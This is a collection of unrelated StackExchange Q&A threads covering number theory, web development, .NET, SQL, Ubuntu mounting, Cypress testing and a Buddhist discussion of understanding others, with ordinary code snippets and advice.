Solving the Diophantine equation $t^n + 2 \equiv 0 \bmod s^n - 1$ My problem is this: find the maximal integer $n$ so that the equation $t^n+2\equiv0 \mod (s^n-1)$ has a solution ($s,t>1$ must be integers). I would like to read your solution, or even just an opinion. I'm not even sure this problem can be solved. It seems to be a difficult problem. I will write $(n,t,s)\in S$ to indicate that the triplet is a solution. Some easy observations follow. $(1,t,d+1)\in S$ for all $t$ and $d$ dividing $t+2$ (since $s^1-1=d$ must divide $t+2$). $(2,t,2)\in S$ if $t$ is not divisible by $3$ (there are other solutions with $n=2$, like $(2,14,10)$.) If there is a solution for a number $n$, then there is a solution for any divisor of $n$. Based on the last observation, I have started a search for solutions with $n$ prime. The only one I found is $(5,8860,19)$.
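Candidate triplets like these are cheap to verify by machine. A small Python check of the membership condition, using three-argument pow so the modular arithmetic stays fast even when $t^n$ is huge:

```python
def is_solution(n, t, s):
    """Does s**n - 1 divide t**n + 2, i.e. is (n, t, s) in S?"""
    m = s**n - 1
    # pow(t, n, m) computes t**n mod m without forming t**n itself.
    return (pow(t, n, m) + 2) % m == 0
```

For instance, is_solution(2, 14, 10) and is_solution(5, 8860, 19) both return True, confirming the triplets quoted above, while is_solution(2, 3, 2) is False, matching the divisible-by-3 exclusion for $n=2$.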
How to send an SMS Message using Email or HTTP Protocols I want to write a piece of PHP code that will send an SMS to any number in the world. I read somewhere that one can use email to do this, as follows. <EMAIL_ADDRESS>⇒<EMAIL_ADDRESS> I tried this with my number and my carrier's website domain and it didn't work. I think the gateway domain is something which is not publicly available, so my first job would be to find it. Am I right here? Also, they could run some checks on the source when they receive the SMS, and reject it. Is that true too? On the other hand, is there any way HTTP can be used to do so? This is possible, but usually you'll need a special agreement with the carrier or with a third party who'll send the SMS. And it'll cost you (here in Germany starting at 8-10 cents for a small number of SMS). There may be different ways to deliver SMS: e-mail, HTTP or a special API. But a simple e-mail to<EMAIL_ADDRESS>will most likely not work. I have never heard of such a method. Some telcos accept e-mails sent to these addresses, but the recipient has to allow/activate this. Edit: Another method you could consider: connecting a GSM module (or even an old mobile phone) to a server and sending SMS via AT commands over a serial/USB connection. You're right, but my question was: how do the different carriers actually do this among themselves? Assume I am carrier A and you're carrier B; how would your customers send my customers SMS through their phones? What request params are there, and what agreement would they need between them? I guess the SMSCs speak SS7 between themselves. SS7 is nothing one could connect to; you have to be a carrier (or a third party with a large throughput). Check the web site of your mobile carrier, or contact their technical support. Email-to-SMS and HTTP-to-SMS gateways are specific to each carrier.
bootstrap new row 11 columns I'm trying to create a responsive layout in Bootstrap with vertically aligned columns. The reason is that I want to have several buttons of different sizes in a responsive toolbar. Searching for ways to do it, the one that seems to work best for me is something like this codepen: http://codepen.io/anon/pen/VYpqLQ For some reason, this custom styling "float:none" seems to be making bootstrap break into a new row at 11 columns instead of 12. Why could this be? Thanks! .verti-align { border: solid 1px blue; } .verti-align > [class^="col-"], .verti-align > [class*=" col-"] { display: inline-block !important; border: solid 1px red; vertical-align: middle; float: none; } <div class="row verti-align"> <div class="col-xs-6 col-md-3">.col-md-3<br><br></div> <div class="col-xs-5 col-md-3">.col-md-3</div> <div class="col-xs-6 col-md-3">.col-md-3<br><br></div> <div class="col-xs-5 col-md-3">.col-md-3 change it to 2 and it works</div> </div> Why don't you use rows? Do you mean table rows? I tried something like that before, but it didn't work for me. I want everything that is on the same line to be vertically aligned, but also to be able to break into two rows if the size of the view is small enough. Nope, I mean bootstrap rows. If I didn't make any mistakes, I'm using bootstrap rows in the code Can you upload an image of the normal and mobile view? Of what you would like it to look like? No problem, it would be something like these: http://i.imgur.com/a4BoPrW.gif http://i.imgur.com/RKdPq9V.gif Add font-size:0 on the parent div (.row) and add the font-size you want on the children (.col-) .verti-align { border: solid 1px blue; font-size:0; } .verti-align > [class^="col-"], .verti-align > [class*=" col-"] { display: inline-block !important; border: solid 1px red; vertical-align: middle; float: none; font-size:15px; } Thank you very much! That made it work. Could you please tell me why it needs this change? 
display:inline-block usually creates an undesirable margin between elements (and you cannot have margins between bootstrap cols). The font-size trick above is one of the solutions for "removing" this margin.
C# Using WebBrowser class to find open IE page and read the HTML I am trying to use the WebBrowser class in C# to find an already opened IE instance and set that open page to be handled by my WebBrowser wb variable. I know several ways of searching already open IE pages using other classes and libraries, and I also know how to open the page from within WebBrowser and proceed that way, but I was hoping that WebBrowser might have some way of capturing an already opened IE instance. I have searched but cannot find the answer to this; is there no way from within this class? Thank you. I don't believe WebBrowser supports this. It's running its own IE process in the background. It might not even be the same IE version that the user is browsing with. You might want to look at using Selenium WebDriver. No. The WebBrowser class is not capable of searching for opened IE instances. It is designed to host its own instance of IE. Thanks for confirming this. Is there another class perhaps that can search for an already open IE instance and invoke "clicks" like the InvokeMember method in WebBrowser? Thank you again Below, I've posted a piece of an app I had that finds an IE instance with a certain URL and kills it. I know you said you wanted to use WebBrowser, but this works... Of course, you'll need to import SHDocVw For Each ieWindow As InternetExplorer In interfaceWindows If ieWindow.LocationURL.Contains("myweburl.com") Then Dim ieWinHandle As IntPtr = New IntPtr(ieWindow.HWND) Console.WriteLine(ieWinHandle.ToString) ieWindow.Quit() End If Next If you wanted to invoke clicks on this, you would need to use a reference to the handle. Also, the InternetExplorer class has quite a few useful properties and methods.
Are questions requesting help with "Fake Virus" code acceptable? Just wondering if questions requesting help with fake viruses are considered acceptable? If the answer is no, what would the correct course of action be if someone asks a question that involves the creation of, or help with, code used for a fake/joke virus? @RyanM that's kind of the point: is a "fake" virus malicious? I think so, but I'm trying to gauge the community's opinion. It's irrelevant if it's malicious or not. What constitutes a "Fake Virus" for you? I've often enough seen code that would by itself not be harmful, but the question implied the real code contained the other bits. An example would be a fake virus that simulates Petya but doesn't harm the computer; it's meant to be a joke. That to me still seems malicious. I did make a point of searching but didn't find anything; this duplicate does appear to answer my question. It might be worth leaving, as it mentions "Fake Virus" specifically, for which my search turned up nothing. Simply downvote it; it is, as far as I know, not off-topic, so your only recourse is to "dislike" it
Dependent Selects in Symfony2 I'm trying to make two dependent selects, but cannot get the ajax call to make it work. My ajax call is: var data = { tower_id:$(this).val(); }; $.ajax({ type: "POST", url: "{{ path('select_apartment')}}", data:data, success: function(data) { var $apartment_selector = $('#apartamentos_apartamentosbundle_resident_apartmentid'); $apartment_selector.html('<option>Apartamentos</option>'); for (var i=0, total = data.length; i < total; i++) { $apartment_selector.append('<option value="' + data[i].id + '">' + data[i].number + '</option>'); } } }); The method in the controller is: public function ApartmentsAction(Request $request){ $tower_id = $request->request->get('tower_id'); $em = $this->getDoctrine()->getManager(); $apartments = $em->getRepository('ApartamentosApartamentosBundle:Apartment')->findByTowerId($tower_id); return new JsonResponse($apartments);} It is as if the javascript does not call the method. The route of the method is: *@Route("/residentapt", name="select_apartment") What am I doing wrong? Any ideas? Thank you. $apartment_selector shouldn't have the $ symbol. It's Javascript, not PHP. You're right; I corrected it, but I still have the problem... the method of the controller is not running. Is it okay to make the call via POST? This javascript is running in the onchange of the first select. Check first if your Javascript function is executed, with a console.log. Yes, it is right to use POST. I checked the console and it works, but the select shows the right number of elements, each saying: undefined.
WebRequest timed out in windows service I use WebRequest in a client to consume a web service on the Internet. Each request is triggered in a separate thread. It works well if the client is hosted in IIS, but most of the requests will get a timed-out error if the client is hosted in a windows service. When I tried to debug the problem using Fiddler, the WebRequest worked well, as all traffic went through <IP_ADDRESS>:8888. Without Fiddler, the traffic goes to the Internet directly through a random port, and the timeout problem hits again. The windows service runs under the Local System account. Why do I get timeouts if the client is in a windows service without using a proxy? Update: My original question wasn't clear. The requests are made concurrently (or at a very short interval). This has to do with the connection limit in the ServicePoint class. By default only 2 connections are allowed to the same external destination. If the destination is local, the limit will be int.MaxValue. That's why Fiddler can magically fix the problem with its proxy. So I manually set the DefaultConnectionLimit to 100 and the requests are on the wire. Adjusting HttpWebRequest Connection Timeout in C# The most common source of problems that is "magically" fixed by running Fiddler is when your .NET code fails to call Close() on the object returned by GetResponseStream(). See http://www.telerik.com/automated-testing-tools/blog/13-02-28/help-running-fiddler-fixes-my-app.aspx for more details.
How to upgrade aspnetcore.dll present in C:\Windows\System32\inetsrv I tried to upgrade the aspnetcore.dll present in C:\Windows\System32\inetsrv to the latest version, but after installing all of the software from https://dotnet.microsoft.com/en-us/download, the aspnetcore.dll version is not changing. I tried every installer from https://dotnet.microsoft.com/en-us/download. Which installer will upgrade the version? I have nothing in my C:\Windows\System32\inetsrv. You can have a look at C:\Program Files (x86)\dotnet\shared\Microsoft.AspNetCore.App; there you may find the version of aspnetcore.dll that you want. Hi Quing Guo, thanks for your kind reply, but in my case the dll is present in the System32\inetsrv folder
Plot probability mass function of fractional hamming distance using Python I would like to plot the pmf of a list of fractional hamming distance values (a list of numbers between 0 and 1). The following code shows what I did: import random import seaborn as sns import matplotlib.pyplot as plt x = [round(random.uniform(0.2, 0.6),2) for i in range(1000)] sns.distplot(x, hist=False) plt.show() The x is the sample list of fractional hamming distance values, and I want to show the distribution of these values. As the figure shows, the y-axis scale is weird. A pmf value should be within [0, 1], but in the figure it goes beyond 1. I do not know how to solve this problem. Could you give me some suggestions? Thank you! There isn't really anything "weird" here. The plot shows the probability density function (pdf), and a density can exceed 1. Showing a probability mass function makes sense for discrete values. In case you want to treat your values discretely and plot a pmf, you could use numpy.unique() import numpy as np import matplotlib.pyplot as plt x = np.round(np.random.uniform(0.2, 0.6, 1000),2) u, cnt = np.unique(x, return_counts=True) plt.stem(u, cnt/len(x), use_line_collection=True) plt.ylim(0,None) plt.show() Got it! Thanks for your answer!
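As a complement to the numpy.unique approach above — and to see why a pmf stays within [0, 1] while a density need not — you can compute the empirical pmf directly with collections.Counter, no plotting required (same simulated data as in the question):

```python
import random
from collections import Counter

x = [round(random.uniform(0.2, 0.6), 2) for _ in range(1000)]

# Count how often each rounded value occurs, then normalize by the
# sample size to turn counts into probability masses.
counts = Counter(x)
pmf = {value: n / len(x) for value, n in counts.items()}

# Each mass is a fraction of the sample, so it lies in (0, 1],
# and all the masses together sum to 1.
```

A kernel density estimate like distplot's, by contrast, integrates to 1 over the x-axis, so its height can legitimately exceed 1 when the data is concentrated in a narrow range.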
Is the attempt to understand others a form of value judgement? In a recent conversation, and in an attempt to understand others, I found myself often unable to understand the actions or behaviors of others, leading to a sense of mental numbness. If I am not able to understand the actions of others, I find that I am in a state of not understanding, and my mind/brain attempts to make sense of it. This can be extremely vicious, since I am unable to let go, and I often find myself in an infinite loop of sorts, which in many situations is very demotivating, depressing and saddening. Should I not attempt to understand the behaviors of others, especially if they have caused harm, be it mental, physical or emotional? If I do not understand their actions, how does one approach the individual? If I did understand, is it a form of value judgement? If I were to abandon the choice to understand, is it a form of value judgement? Examples - These are real-world situations I have faced For example, I was approached by an individual who had traumatized another, and my inability to reconcile their behavior made it highly saddening: why would one hurt another? Another example is when I find others taking a short-term view of situations, or simply not working with others in a cohesive manner (looking after their own interests): the unwillingness to help when help is sought, or to forsake other priorities when attention is needed in other areas. I am unsure what the Buddha would do in situations such as these. If he were approached by a murderer, for example, what would the Buddha do, say, not say, etc.? look up Angulimala for how the Buddha would treat a murderer. Even when everyone's motivation is understood, there is still the challenge of overcoming our habitual reaction to their actions. Most people like to blame others, and not look deeply inside and effect change. Explaining to someone why they act the way they do won't change their action. Often they are powerless. 
All we can do is look inside and change our reaction to everyone's actions. This is one of the interesting aspects of Buddhism, that in its ideal form it doesn't allow prejudice (valid or otherwise) to interfere with the teaching. The Buddha taught people of all sorts, good and bad. "Brethren, the omniscient Buddha whose wisdom is vast, ready, swift, sharp, crushing heretical doctrines, after having converted, by the power of his own knowledge, the Brahmins Kūṭadanta and the rest, the ascetics Sabhiya and the rest, the thieves Aṅgulimāla &c., the yakkhas Āḷavaka &c., the gods Sakka and the rest, and the Brahmins Baka &c., made them humble, and ordained a vast multitude as ascetics and established them in the fruition of the paths of sanctification." -- Jāt 542 (Cowell, trans) The only distinction he seems to have made when deciding who to teach is between worthwhile and pointless. Now the Blessed One thought: 'To whom shall I preach the doctrine first? Who will understand this doctrine easily?' Mv 1.6 (Rhys-Davids, trans) Since Buddhism teaches the overcoming of partiality, the first thing one should accomplish when trying to come to terms with other people's behaviour is to free oneself from sadness or anger at the bad deeds of others. Whether that venerable one dwells in the Sangha or alone, while some there are well behaved and some are ill behaved and some there teach a group, while some here are seen concerned about material things and some are unsullied by material things, still that venerable one does not despise anyone because of that. -- MN 47 (Bodhi, trans) Having said and quoted all this, on to your questions: 1. Should I not attempt to understand the behaviors of others, especially if they have caused harm, be it mental, physical or emotional? There is no reason to single out such behaviours. But the question of whether one should ever attempt to understand the behaviours of others is more interesting. 
The goal of Buddhism is ostensibly the attainment of freedom from suffering. Insofar as understanding the behaviours of others leads to freedom from suffering, it should be pursued. Certainly, understanding others is considered useful in understanding oneself; it is also useful in helping others to understand themselves, as you can then provide advice and point out (tactfully) facets the other person may be missing about their situation. 2. If I do not understand their actions, how does one approach the individual? Buddhism doesn't recognize the existence of an individual in ultimate reality. Hence, the approach is to take the present for what it is. This helps immensely in interpersonal relations, as one need not bear grudges or prejudge others based on their past. Since beings are fluid and dynamic, the best way to approach others is with an open mind, ready to take them at face value in the present moment. 3. If I did understand, is it a form of value judgement? In Buddhism, we tend to think more in terms of partiality than judgement. Judging whether something is good or evil can be wisdom-based; partiality is always based on delusion (or more directly, one of four: desire, anger, delusion, or fear - the four agati). So, understanding whether someone's actions are good or bad is useful; liking or disliking them is harmful. 4. If I were to abandon the choice to understand, is it a form of value judgement? I guess you mean: is it a form of e.g. aversion if you reject the impulse to understand others? If so, then for sure it can be; it all depends on one's mindset. 
In general, the Buddha was critical of those who refuse to help others: ‘In the same way, Lohicca, if anyone should say: “Suppose an ascetic or Brahmin were to discover some good doctrine and thought he ought not to declare it to anyone else, for what can one man do for another?” he would be a source of danger to those young men of good family who, following the Dhamma and discipline taught by the Tathāgata, attain to such excellent distinction as to realise the fruit of Stream-Entry, of Once-Returning, of Non-Returning, of Arahantship — and to all who ripen the seeds of a rebirth in the deva-world. Being a source of danger to them, he is uncompassionate, and his heart is grounded in hostility, and that constitutes wrong view, which leads to ... hell or an animal rebirth. -- DN 12 (Walshe, trans) but this doesn't mean one need go out of one's way to try and figure others out, just that one should help others as appropriate. And of course, in order to help, one must understand. One should first establish oneself in what is proper; then only should one instruct others. Thus the wise man will not be reproached. -- Dhp 158 (Buddharakkhita, trans) In summary, understanding others is useful in that it gives the potential to help oneself and others. It is partiality that is problematic, as well as obsession with others to the extent that one forgets oneself. Thank you yuttadhammo. You pointed to a number of things, and this leads to wanting to understand it more deeply. You comment that there is no need to single out behaviors. What if these behaviors repeat? Wouldn't the acceptance of such behaviors simply reinforce the actions? Isn't it simply human that if one sees that the behavior is validated (or ignored), one continues with it? You note that the best way to approach others is with an open mind, ready to take them at face value in the present moment. I appreciate this; however, how does wisdom play a role in this? 
For example, over the course of one's life and experiences, does this not provide pointers or hints to what is being confronted? For example, as a child I was raised in an environment surrounded by violence, lies, etc. This led to learning body language, the behaviors exhibited, and whether the person could be trusted. I am far from being a saint; however, I am tired of the continuous role-playing and the facades of keeping up appearances. We tend to wear masks when at work, with friends, with loved ones, etc. I don't want to be a dichotomy of each one of these. You make the final comment that it is partiality that is problematic, as well as obsession with others to the extent that one forgets oneself. I agree; hence I am tired, confused, and wanting to take a different path. I want to help (especially when I can see it being valuable not just to myself but to others). I want to reduce the playtime of the concepts of superiority or inferiority. I want to contribute, and would like others to as well, for the greater good. I feel like I am lost, fighting a losing battle with others and myself. You also note that this doesn't mean one need go out of one's way to try and figure others out. Where does one draw the line in the sand, be it understanding or allowing certain behaviors and actions? One of the reasons for not "understanding" others is our own unwillingness to accept that others can act out of malice, selfishness, and basically unskillfully. Their actions are conditioned by their upbringing, their values, friends, families, books they read, goals they want, etc. Can we really understand their conditionings when they are that numerous? We accept that they behave badly because of their conditioning. If you and I had their conditioning we would behave exactly the way they do, because we are conditioned. People behave as they do, both good and bad, because they are conditioned. How hard is it to change our own conditioning, and how much more difficult others' conditioning. 
If we want (crave) to change others, and that craving is not satisfied, suffering arises (the second noble truth). One can earnestly try and then accept the results as they are, and no suffering arises; and then try again, and again..
common-pile/stackexchange_filtered
How can I access my Windows partition as an ordinary user? I have a dual-boot laptop with Win7 and Ubuntu 11.10. For a few days now, Ubuntu has not been automatically mounting the Windows partition or USB drives. It's also not possible to change the desktop wallpaper. I "fixed" the Windows partition by modifying /etc/fstab by hand. I also played around a bit, and now Ubuntu mounts the USB drive. On the other hand, I cannot unmount them because umount: only root can unmount UUID=521832F21832D4A7 from /media/WINDOWS But my account is an admin account, so I do not understand why I get this message. If I unmount with sudo from a terminal there is no problem. For the wallpaper I get no error message, but I can't change anything. I also tried to assign my account to the "normal" user group and then back to the admin group: useless. I believe that even though my account is an administrator, there is something messed up with permissions. A few days ago a guest played a bit with my account and the standard guest user (he couldn't unlock it, as he forgot the password). I don't know if this could be the cause, but at the moment I don't understand what it could be. Thank you for your help. When you run the sudo command in the Terminal, that causes what you type after sudo to be run as root. This is why it works from the Terminal--because the technique you are using makes you act as root. Being an administrator does not mean you are root, or that most of what you do is done as root. It does mean that you can perform actions as root with a couple of built-in facilities (one of which is sudo). When partitions are mounted automatically from /etc/fstab, the mount operation is performed by root, so it is necessary to be root (or run a command as root) to undo it. This is the normal and expected behavior, and not a bug. When you mount partitions dynamically as a non-root user, behind the scenes that uses udisks --mount. Then you can unmount them automatically with udisks --unmount (which is what happens behind the scenes when you unmount them). 
The way you fixed your problem prevents this from happening, because /etc/fstab entries are not mounted/unmounted dynamically with udisks. So it seems that the way you've fixed your problem does not fully suit your needs. I recommend that you post a new question detailing the problem you were experiencing, so that someone can help you make automatic, non-root mounting and unmounting of your Windows partition work again. I didn't know that fstab does its job as root (even in Ubuntu, where there is no root?). The udisks thing seems promising, but everything worked out of the box after installation (months ago) without configuring anything. At this point I cannot use the touchpad anymore and am still having the wallpaper problem. Is there a way to tell whether this is a permission problem? @ray The touchpad problem is also probably a separate problem. To address your question about there being "no root" in Ubuntu: In Ubuntu, there absolutely is a root account. It just has logins disabled. Logging in as root is not supported, recommended, or necessary, because the system provides facilities like sudo to allow a non-root user to perform actions as root. The root account still does exist. Run top in the Terminal, and you'll see plenty of programs running as root as part of the system. (Press q to quit top.) It seems the touchpad goes away after trying to unmount the Windows partitions from Nautilus. And now I notice my terminal has disappeared from the Launcher (I usually call it from a shortcut, that's why I didn't see it before!). I will follow your suggestion and try to split the problem into different questions, even if their concurrent appearance hints, IMO, at a common root cause. Thank you anyway for your information
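As a concrete sketch of the fstab route discussed in this thread: the usual reason umount demands root for an fstab-mounted partition is that the entry lacks a user option. A hypothetical entry, reusing the UUID from the question (the ntfs-3g type and the uid value are illustrative assumptions, not taken from the asker's system):

```
# /etc/fstab - 'users' lets any ordinary user mount and unmount this entry
UUID=521832F21832D4A7  /media/WINDOWS  ntfs-3g  defaults,users,uid=1000  0  0
```

With users (or user) present, umount /media/WINDOWS works without sudo; without it, the "only root can unmount" message from the question is mount's documented behavior for fstab entries.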
common-pile/stackexchange_filtered
Increasing iframe height I am loading an HTML page into a div (e.g. #targets) using jQuery's load(). The div is inside the iframe. After loading the HTML file, the div height and iframe height are not increased to match the content height. How do I change the iframe and div height based on the HTML content in the div? Any feedback on the answers given? Do none work out for you??? try this css code: div, iframe { overflow:auto; height:auto; } I suggest reading this blog post jQuery iFrame Sizing // For some browsers (for opera, safari check blog post, chrome?) $('iframe').load(function() { this.style.height = this.contentWindow.document.body.offsetHeight + 'px'; });
common-pile/stackexchange_filtered
Find set of record rowid from multiple columns I have two SQL temp tables, #Temp1 and #Temp2, and I want to get the rowid in #Temp1 that contains exactly the set of rows in #Temp2. E.g. #Temp2 has 4 records; I want to search temp table #Temp1 for the rowid that contains that set of (userid, departmentid) records. CREATE TABLE #Temp1(rowid INT, userid INT, departmentid int) CREATE TABLE #Temp2(userid INT, departmentid int) INSERT INTO #Temp1 (rowid,userid,departmentid ) VALUES (1,1,1),(1,2,2),(1,3,3),(1,4,4),(1,2,1), (2,2,1),(2,2,2),(2,3,3),(2,4,4), (3,3,1),(3,2,2),(3,3,3),(3,4,4) INSERT INTO #Temp2 (userid,departmentid ) VALUES (2,1),(2,2),(3,3),(4,4) DROP TABLE #Temp1 DROP TABLE #Temp2 I want the output to be rowid 2, because it contains exactly the set (2,1),(2,2),(3,3),(4,4). One thing: rowid 1 also contains the same set of records, but it has one more row; when I search #Temp1 for rowid 2, I find exactly those 4 records, so that is the set of records I am looking for. Thanks Would you still want row 2 if it had another pair, such as (2, 1, 1)? I've rolled back the question to its original state. Please do not make such changes, because you invalidated existing answers; if you need further assistance, consider asking a new question. Let's assume the rows in #Temp1 are unique. Then you can do this using join and group by: select t1.rowid from #Temp1 t1 left join #Temp2 t2 on t1.userid = t2.userid and t1.departmentid = t2.departmentid group by t1.rowid having count(*) = (select count(*) from #Temp2 t2) and count(*) = count(t2.userid) ; This assumes no duplicates in either table. Note: This returns rows that are identical to or a superset of the values in the second table. but it gives me rowid 1, which I didn't want; I want only 2 @bhupendrasingh . . . It wasn't clear to me if you wanted supersets or not. I adjusted the query. @GordonLinoff You can't refer to t2 with having count(*) = (select count(*) from t2). You will get an invalid object error. 
It's taking a long time to execute @bhupendrasingh . . . You want indexes on (userid, departmentid) in both tables. i make some change in temp1 table how update row same on every record then this query not working You could use: SELECT rowid FROM #Temp1 t1 WHERE NOT EXISTS(SELECT userid, departmentid FROM #Temp1 tx WHERE tx.rowid=t1.rowid EXCEPT SELECT userid, departmentid FROM #Temp2) GROUP BY rowid HAVING COUNT(*) = (SELECT COUNT(*) FROM #Temp2); Output: 2 Rextester Demo i make some change in temp1 table how update row same on every record then this query not working
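The set-equality ("relational division") logic in the answers above is easy to get subtly wrong, so here is a self-contained sketch of the NOT EXISTS / EXCEPT approach, transcribed to SQLite via Python so it can be run anywhere. The column is renamed rowid_ because rowid is special in SQLite; everything else mirrors the question's data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE temp1(rowid_ INT, userid INT, departmentid INT)")
cur.execute("CREATE TABLE temp2(userid INT, departmentid INT)")
cur.executemany("INSERT INTO temp1 VALUES (?,?,?)",
                [(1, 1, 1), (1, 2, 2), (1, 3, 3), (1, 4, 4), (1, 2, 1),
                 (2, 2, 1), (2, 2, 2), (2, 3, 3), (2, 4, 4),
                 (3, 3, 1), (3, 2, 2), (3, 3, 3), (3, 4, 4)])
cur.executemany("INSERT INTO temp2 VALUES (?,?)",
                [(2, 1), (2, 2), (3, 3), (4, 4)])

# A rowid_ qualifies when its set of (userid, departmentid) pairs minus
# temp2 is empty (no extras) AND its row count equals temp2's row count
# (nothing missing) -- i.e. the sets are equal, assuming no duplicates.
rows = cur.execute("""
    SELECT t1.rowid_
    FROM temp1 t1
    WHERE NOT EXISTS (
        SELECT userid, departmentid FROM temp1 tx WHERE tx.rowid_ = t1.rowid_
        EXCEPT
        SELECT userid, departmentid FROM temp2)
    GROUP BY t1.rowid_
    HAVING COUNT(*) = (SELECT COUNT(*) FROM temp2)
""").fetchall()
print(rows)  # [(2,)] -- rowid 1 is excluded by its extra (1, 1) pair
```

The NOT EXISTS clause rejects groups with extra pairs, and the HAVING clause rejects groups with missing pairs; only an exact match survives both.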
common-pile/stackexchange_filtered
How to share response data across multiple suites? Let's say we have the following suite: describe('Devices', () => { describe('Master Data Set-Up', () => { it('should create the device if necessary', () => { cy.createDevice() .its('body.id') .as('deviceId'); }); }); describe('Test Suite 1', () => { it('should allow to send data to device', () => { cy.get('@deviceId').then((deviceId) => { cy.sendData(deviceId, 'Some Data'); }); }); }); }); So, we have a set-up suite that creates master data. This is a simplified version; actually it contains a couple of it specs, and I'd like to keep it like that because it's easier to read in the Cypress output. Then there is the actual test suite that wants to use data that has previously been created, in this case a server-generated id that should be used for another REST call. This assumes that cy.createDevice and cy.sendData are custom commands that internally use cy.request. When running that, cy.get('@deviceId') fails because aliases are not shared across describe blocks, AFAIK. I tried to use let deviceId but it's undefined, as it is not yet available when the test specs are processed. What is a proper way to do this? Hi. Besides a global variable, which is an anti-pattern, this post could be helpful: https://github.com/cypress-io/cypress/issues/1392#issuecomment-660588861 Maybe try using writeFile https://docs.cypress.io/api/commands/writefile.html and readFile https://docs.cypress.io/api/commands/readfile.html#Syntax Ok, so first thanks to Aloysius and Arek for their answers. But I had the gut feeling that there must be some easier way to do this than writing an id to a file. As I mentioned before, I had issues with my first attempt to use a global variable: I tried to use let deviceId but it's undefined, as it is not yet available when the test specs are processed. I really wanted to understand why this did not work, and did some console debugging. 
I added a console log: describe('Devices', () => { console.log('Loading test suites...') (...) }); When running the tests, I saw the log output twice, once after the first describe block where the device id was stored, and then a second time after the master data was written. Actually, I found out that this issue was caused by the following known Cypress issue: https://github.com/cypress-io/cypress/issues/2777 After setting the baseUrl, it actually works: describe('Devices', () => { let deviceId; before( () => { Cypress.config('baseUrl', Cypress.env('system_url')) cy.visit('/'); }) describe('Master Data Set-Up', () => { it('should create the device if necessary', () => { cy.createDevice() .its('body.id') .then((id) => { deviceId = id; }); }); }); describe('Test Suite 1', () => { it('should allow to send data to device', () => { cy.sendData(deviceId, 'Some Data'); }); }); }); I believe this will be a better solution; as Cypress is asynchronous, it's better to write it to a file and read it back describe('Devices', () => { describe('Master Data Set-Up', () => { it('should create the device if necessary', () => { cy.createDevice() ...... cy.writeFile('deviceId.txt', body.id) }); }); describe('Test Suite 1', () => { it('should allow to send data to device', () => { cy.readFile('deviceId.txt').then((device_id) => { cy.sendData(device_id, 'Some Data'); }) }); }); }); This can fail if tests run in parallel. Better to get the id in a before(). Also the pattern you want for saving is cy.createDevice().its('body.id').then(id => cy.writeFile('deviceId.txt', id)).
common-pile/stackexchange_filtered
Clip or Mask a 2D texture Hey, I was wondering if anyone knows how to do clipping with 2D textures for a GUI or menu-like system. Here's an example of the output I would like to produce: Have a game screen with a size of 500 x 500, with a screen behind it with a size of 1000 x 1000. When I draw a texture at 0, 0 with the parent screen of 500 x 500, I would like the component not to be shown; but if I draw the component at 500, 450 and the texture width and height are 100, I would expect to see the whole width but only half the height of the component. I was wondering if there is an easy way of doing this? Edit: Basically I was thinking of something like a mask effect in Photoshop. Here is a picture: Clipping picture The black outline is where the other half of the texture would be drawn. You can clip a texture. When the resulting shape is polygonal, you can do it by simply modifying the vertices and texture coordinates. When the clipped texture is a complicated shape, then things get trickier. You can also clip by just drawing everything in the right order. It may not be efficient, but it is easy. p.s. A picture would help here. Another way to solve this problem: basically you have two scenes to draw: the game screen (the blue part in your picture) and the background screen (the red part of your picture). I think you could draw the game screen and the background screen into two different bitmap objects (or whatever similar you have in your graphics library). The next step is to blit the entire background screen bitmap to the output bitmap object, and then you could blit just the central part (a 500 x 500 square centered in the output screen) of the game screen. P.S.: Maybe it would be better if you could add more details about the graphics library you are using. Well, the red was supposed to be another screen behind it.
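The CPU-side arithmetic behind this kind of clipping (what a scissor test does on the GPU) is just a rectangle intersection. A small sketch, independent of any particular graphics library; the function name and the example numbers are illustrative, e.g. a 100 x 100 texture drawn at (200, 450) in a 500 x 500 screen keeps its full width but only 50 px of its height:

```python
def clip_rect(sprite, screen):
    """Intersect two (x, y, w, h) rectangles; a zero-size result is invisible."""
    x0 = max(sprite[0], screen[0])
    y0 = max(sprite[1], screen[1])
    x1 = min(sprite[0] + sprite[2], screen[0] + screen[2])
    y1 = min(sprite[1] + sprite[3], screen[1] + screen[3])
    # Clamp to zero so fully off-screen sprites yield an empty rectangle.
    return (x0, y0, max(0, x1 - x0), max(0, y1 - y0))

screen = (0, 0, 500, 500)
print(clip_rect((200, 450, 100, 100), screen))  # (200, 450, 100, 50)
print(clip_rect((600, 100, 100, 100), screen))  # width 0: fully off-screen
```

When drawing the clipped sprite, shift the texture coordinates by the same amounts the rectangle was trimmed. If the library in use is OpenGL, enabling GL_SCISSOR_TEST with glScissor over the 500 x 500 region achieves the same effect without any manual math.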
common-pile/stackexchange_filtered
PHP file inclusion on a required file Here is an example directory structure:

-Root
  index.php
  -forms
    form.php
  -include
    include.php

In my index.php I am requiring form.php: require_once('forms/form.php'); In my form.php I am requiring the include.php file. Which of the following is correct: require_once('../include/include.php'); require_once('include/include.php'); My confusion comes from the idea that the form is being rendered in the index file, so would the files the form includes need to be relative to the index (since that is where it's rendered), or would they need to be relative to form.php itself, regardless of where it is rendered? You can, very primitively, think of require as roughly the same as eval(file_get_contents(...)) - it keeps the current context, which includes the current working directory. Just don't include files like that... the moment your codebase reaches a certain degree of complexity, it'll be almost impossible to know what path to use, when and where. Use set_include_path and define a constant like PROJECT_ROOT, and use paths relative to that constant path. Correct is require_once('include/include.php'); but it is better to use an absolute path: require_once(__DIR__.'/../include/include.php'); __DIR__ works from PHP 5.3.0 up. In earlier versions its equivalent was dirname(__FILE__). ../include/include.php Not correct! Because it goes from the index file! So the other one would be correct! Just test it and you will see it too. oops, sorry, haven't noticed that, thank you, I tried to be quicker than you :) Thanks for including the better way to do it instead of just answering. I was able to get it to work using 'include/include.php'. You can use the magic constant __DIR__, so you don't have to think about this, e.g. require_once(__DIR__ . '/include/include.php'); Shouldn't it be require_once(__DIR__ . '/../include/include.php'); since form.php is inside the forms directory which is a "sibling" to the include directory?
common-pile/stackexchange_filtered